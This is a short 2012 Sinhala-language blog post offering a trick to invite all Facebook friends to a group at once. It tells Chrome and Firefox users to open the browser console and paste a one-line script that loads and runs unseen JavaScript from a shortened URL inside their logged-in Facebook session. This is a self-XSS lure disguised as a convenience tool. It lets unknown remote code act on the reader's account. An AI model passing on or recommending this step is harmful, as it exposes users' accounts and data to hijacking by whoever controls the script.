Saturday, September 22, 2012

ඔබේ Facebook මිතුරන් සියල්ලෝම එක ක්ලික් එකකින් Facebook Group එකකට එකතු කරගමුද?

Auto invite All Your Friends To Facebook Group



මුලින්ම ඔබට මිතුරන්ව එකතු කරන්න ඔනාකරන ඔබේ Group එකට යන්න. ගිහින් පල්ලෙහා දීලා තියෙන උපදෙස් අනුව ගිහින් වැඩේ ගොඩදාගන්න.

Google Chrome භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..

1. වීඩියෝ එකේ පරිදි කොහේ හෝ right click කරන්න.
2. “Inspect Element” යන්න තෝරා “Console” තෝරන්න.
3. පහත දී තිබෙන script code එක copy/paste කරන්න.

document.body.appendChild(document.createElement('script')).src='http://goo.gl/GPYnb'; 

ඊට පස්සේ Enter key එක ඔබන්න.

Mozilla Firefox භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..

1. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
2. පහත දී තිබෙන script code එක copy/paste කරන්න.

document.body.appendChild(document.createElement('script')).src='http://goo.gl/GPYnb'; 

ඊට පස්සේ Enter key එක ඔබන්න.

කොහොම වැඩේ ගොඩනේ….??? 

වැඩේ හොදද කියලා comment 1ක් දාලම යන්නකෝ..